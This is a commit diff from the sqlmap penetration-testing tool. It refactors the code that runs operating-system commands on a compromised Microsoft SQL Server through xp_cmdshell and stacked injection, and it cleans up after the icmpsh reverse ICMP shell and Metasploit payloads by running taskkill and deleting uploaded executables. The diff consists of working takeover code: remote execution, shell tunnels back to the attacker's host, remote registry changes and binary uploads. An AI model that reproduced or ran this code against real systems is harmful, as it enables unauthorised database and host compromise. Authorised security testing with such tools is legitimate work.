Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown.

bdamele · bdamele · commit 4f8e9da1b624 · 2010-10-28T00:19:40.000Z
Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only.
Got rid of useless doubleslash param in delRemoteFile() method.
Major code refactoring to xp_cmdshell.py methods and parent calls.
diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py
@@ -93,7 +93,7 @@ def main(src, dst):
                 except:
                     pass
 
-                if cmd == 'exit':
+                if cmd == 'exit\n':
                     return
 
                 # Set sequence number and identifier
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
@@ -32,15 +32,15 @@ def __init__(self):
         Web.__init__(self)
         xp_cmdshell.__init__(self)
 
-    def execCmd(self, cmd, silent=False, forgeCmd=False):
+    def execCmd(self, cmd, silent=False):
         if self.webBackdoorUrl and not kb.stackedTest:
             self.webBackdoorRunCmd(cmd)
 
         elif kb.dbms in ( "MySQL", "PostgreSQL" ):
             self.udfExecCmd(cmd, silent=silent)
 
         elif kb.dbms == "Microsoft SQL Server":
-            self.xpCmdshellExecCmd(cmd, silent, forgeCmd)
+            self.xpCmdshellExecCmd(cmd, silent)
 
         else:
             errMsg = "Feature not yet implemented for the back-end DBMS"
@@ -79,7 +79,7 @@ def runCmd(self, cmd):
             else:
                 dataToStdout("No output\n")
         else:
-            self.execCmd(cmd, forgeCmd=True)
+            self.execCmd(cmd)
 
     def shell(self):
         if self.webBackdoorUrl and not kb.stackedTest:
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
@@ -7,40 +7,21 @@
 See the file 'doc/COPYING' for copying permission
 """
 
-import codecs
 import os
-import re
-import stat
-import sys
 import time
 
-from select import select
-from subprocess import PIPE
-from subprocess import Popen as execute
-
 from extra.icmpsh.icmpsh_m import main as icmpshmaster
 
-from lib.core.common import dataToStdout
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
-from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
-from lib.core.common import pollProcess
-from lib.core.common import randomRange
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
-from lib.core.exception import sqlmapDataException
-from lib.core.exception import sqlmapFilePathException
-from lib.core.subprocessng import blockingReadFromFD
-from lib.core.subprocessng import blockingWriteToFD
-from lib.core.subprocessng import setNonBlocking
-from lib.request.connect import Connect as Request
-from lib.takeover.upx import upx
 
 
 class ICMPsh:
@@ -81,22 +62,18 @@ def __runIcmpshSlaveRemote(self):
         infoMsg  = "running icmpsh slave remotely"
         logger.info(infoMsg)
 
-        self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
-
-        cmd = "%s &" % self.__icmpshSlaveCmd
-
-        if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
-            cmd = self.xpCmdshellForgeCmd(cmd)
+        cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr)
 
         self.execCmd(cmd, silent=True)
 
     def uploadIcmpshSlave(self, web=False):
         self.__randStr = randomStr(lowercase=True)
+        self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr
 
         if web:
-            self.__icmpslaveRemote = "%s/tmpi%s.exe" % (self.webDirectory, self.__randStr)
+            self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase)
         else:
-            self.__icmpslaveRemote = "%s/tmpi%s.exe" % (conf.tmpPath, self.__randStr)
+            self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase)
 
         self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote))
 
@@ -115,4 +92,7 @@ def icmpPwn(self):
         debugMsg  = "icmpsh master exited"
         logger.debug(debugMsg)
 
-        self.delRemoteFile(self.__icmpslaveRemote, doubleslash=True)
+        time.sleep(1)
+        self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True)
+        time.sleep(1)
+        self.delRemoteFile(self.__icmpslaveRemote)
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
@@ -397,9 +397,6 @@ def __runMsfPayloadRemote(self):
 
         cmd = "%s &" % self.exeFilePathRemote
 
-        if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
-            cmd = self.xpCmdshellForgeCmd(cmd)
-
         self.execCmd(cmd, silent=True)
 
     def __loadMetExtensions(self, proc, metSess):
@@ -648,7 +645,8 @@ def pwn(self, goUdf=False):
         logger.debug(debugMsg)
 
         if not goUdf:
-            self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
+            time.sleep(1)
+            self.delRemoteFile(self.exeFilePathRemote)
 
     def smb(self):
         self.__initVars()
diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py
@@ -87,7 +87,7 @@ def readRegKey(self, regKey, regValue, parse=False):
             if index != -1:
                 data = data[index + len(pattern):]
 
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.delRemoteFile(self.__batPathRemote)
 
         return data
 
@@ -101,8 +101,8 @@ def addRegKey(self, regKey, regValue, regType, regData):
         debugMsg += "to registry key '%s'" % self.__regKey
         logger.debug(debugMsg)
 
-        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.execCmd(cmd=self.__batPathRemote)
+        self.delRemoteFile(self.__batPathRemote)
 
     def delRegKey(self, regKey, regValue):
         self.__operation = "delete"
@@ -114,5 +114,5 @@ def delRegKey(self, regKey, regValue):
         debugMsg += "from registry key '%s'" % self.__regKey
         logger.debug(debugMsg)
 
-        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.execCmd(cmd=self.__batPathRemote)
+        self.delRemoteFile(self.__batPathRemote)
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -36,7 +36,7 @@ def __xpCmdshellCreate(self):
             cmd += "RECONFIGURE WITH OVERRIDE; "
             cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
             cmd += "RECONFIGURE WITH OVERRIDE; "
-            self.xpCmdshellExecCmd(cmd)
+            inject.goStacked(cmd)
 
         self.__randStr = randomStr(lowercase=True)
 
@@ -51,7 +51,7 @@ def __xpCmdshellCreate(self):
         if kb.dbmsVersion[0] in ( "2005", "2008" ):
             cmd += " RECONFIGURE WITH OVERRIDE;"
 
-        self.xpCmdshellExecCmd(cmd)
+        inject.goStacked(cmd)
 
     def __xpCmdshellConfigure2005(self, mode):
         debugMsg  = "configuring xp_cmdshell using sp_configure "
@@ -85,10 +85,10 @@ def __xpCmdshellConfigure(self, mode):
         else:
             cmd = self.__xpCmdshellConfigure2000(mode)
 
-        self.xpCmdshellExecCmd(cmd)
+        inject.goStacked(cmd)
 
     def __xpCmdshellCheck(self):
-        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
+        query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
         duration = timeUse(query)
 
         if duration >= conf.timeSec:
@@ -102,17 +102,15 @@ def xpCmdshellForgeCmd(self, cmd):
 
         return forgedCmd
 
-    def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
-        if forgeCmd:
-            cmd = self.xpCmdshellForgeCmd(cmd)
-
+    def xpCmdshellExecCmd(self, cmd, silent=False):
+        cmd = self.xpCmdshellForgeCmd(cmd)
         inject.goStacked(cmd, silent)
 
     def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
         self.getRemoteTempPath()
 
         tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-        cmd     = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))
+        cmd = "%s > %s" % (cmd, tmpFile)
 
         self.xpCmdshellExecCmd(cmd)
 
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
@@ -146,13 +146,10 @@ def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
 
             logger.debug("moving binary file %s to %s" % (sFile, dFile))
 
-            commands   = ("cd \"%s\"" % tmpPath,
-                          "ren %s %s" % (chunkName, dFileName),
-                          "move /Y %s %s" % (dFileName, dFile))
-            complComm  = " & ".join(command for command in commands)
-            forgedCmd  = self.xpCmdshellForgeCmd(complComm)
+            commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
+            complComm = " & ".join(command for command in commands)
 
-            self.execCmd(forgedCmd)
+            self.execCmd(complComm)
 
         else:
             infoMsg  = "the %s file is bigger than %d " % (fileType, debugSize)
@@ -177,13 +174,10 @@ def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
                 infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName)
                 logger.debug(infoMsg)
 
-                commands   = ("cd %s" % tmpPath,
-                               copyCmd,
-                               "del /F %s" % chunkName)
-                complComm  = " & ".join(command for command in commands)
-                forgedCmd  = self.xpCmdshellForgeCmd(complComm)
+                commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
+                complComm = " & ".join(command for command in commands)
 
-                self.execCmd(forgedCmd)
+                self.execCmd(complComm)
 
                 logger.info("file chunk %d written" % counter)
 
@@ -193,12 +187,10 @@ def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
 
             logger.debug("moving binary file %s to %s" % (sFile, dFile))
 
-            commands  = ("cd %s" % tmpPath,
-                         "move /Y %s %s" % (dFileName, dFile))
+            commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
             complComm = " & ".join(command for command in commands)
-            forgedCmd = self.xpCmdshellForgeCmd(complComm)
 
-            self.execCmd(forgedCmd)
+            self.execCmd(complComm)
 
         if confirm:
             self.askCheckWrittenFile(wFile, dFile, fileType)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
@@ -205,26 +205,18 @@ def updateBinChunk(self, binaryData, tmpPath):
             charCounter += len(forgedScrLine)
 
             if charCounter >= maxLen:
-                forgedCmd = self.xpCmdshellForgeCmd(cmd)
-                self.execCmd(forgedCmd)
+                self.execCmd(cmd)
 
-                cmd         = ""
+                cmd = ""
                 charCounter = 0
 
         if cmd:
-            forgedCmd = self.xpCmdshellForgeCmd(cmd)
-            self.execCmd(forgedCmd)
-
-        commands = (
-                     "cd %s" % tmpPath,
-                     "debug < %s" % randScr,
-                     "del /F /Q %s" % randScr
-                   )
+            self.execCmd(cmd)
 
+        commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr )
         complComm = " & ".join(command for command in commands)
-        forgedCmd = self.xpCmdshellForgeCmd(complComm)
 
-        self.execCmd(forgedCmd, silent=True)
+        self.execCmd(complComm, silent=True)
 
         return chunkName
 
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
@@ -75,20 +75,16 @@ def getVersionFromBanner(self):
         kb.bannerFp["dbmsVersion"] = inject.getValue(query, unpack=False)
         kb.bannerFp["dbmsVersion"] = kb.bannerFp["dbmsVersion"].replace(",", "").replace("-", "").replace(" ", "")
 
-    def delRemoteFile(self, tempFile, doubleslash=False):
+    def delRemoteFile(self, tempFile):
         self.checkDbmsOs()
 
         if kb.os == "Windows":
-            if doubleslash:
-                tempFile = tempFile.replace("/", "\\\\")
-            else:
-                tempFile = posixToNtSlashes(tempFile)
-
+            tempFile = posixToNtSlashes(tempFile)
             cmd = "del /F /Q %s" % tempFile
         else:
             cmd = "rm -f %s" % tempFile
 
-        self.execCmd(cmd, forgeCmd=True)
+        self.execCmd(cmd)
 
     def createSupportTbl(self, tblName, tblField, tblType):
         inject.goStacked("DROP TABLE %s" % tblName)
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
@@ -153,6 +153,8 @@ def osPwn(self):
                 errMsg += "is unlikely to receive commands send from you"
                 logger.error(errMsg)
 
+            self.sysUdfs.pop("sys_bineval")
+
         if kb.stackedTest or conf.direct:
             web = False
 
@@ -207,7 +209,7 @@ def osPwn(self):
             elif tunnel == 2:
                 self.uploadIcmpshSlave(web=web)
                 self.icmpPwn()
-                
+
         elif not kb.stackedTest and kb.dbms == "MySQL":
             web = True
 
@@ -244,8 +246,8 @@ def osPwn(self):
             if not web or (web and self.webBackdoorUrl is not None):
                 self.pwn(goUdf)
 
-            if not conf.cleanup:
-                self.cleanup()
+        if not conf.cleanup:
+            self.cleanup()
 
     def osSmb(self):
         stackedTest()
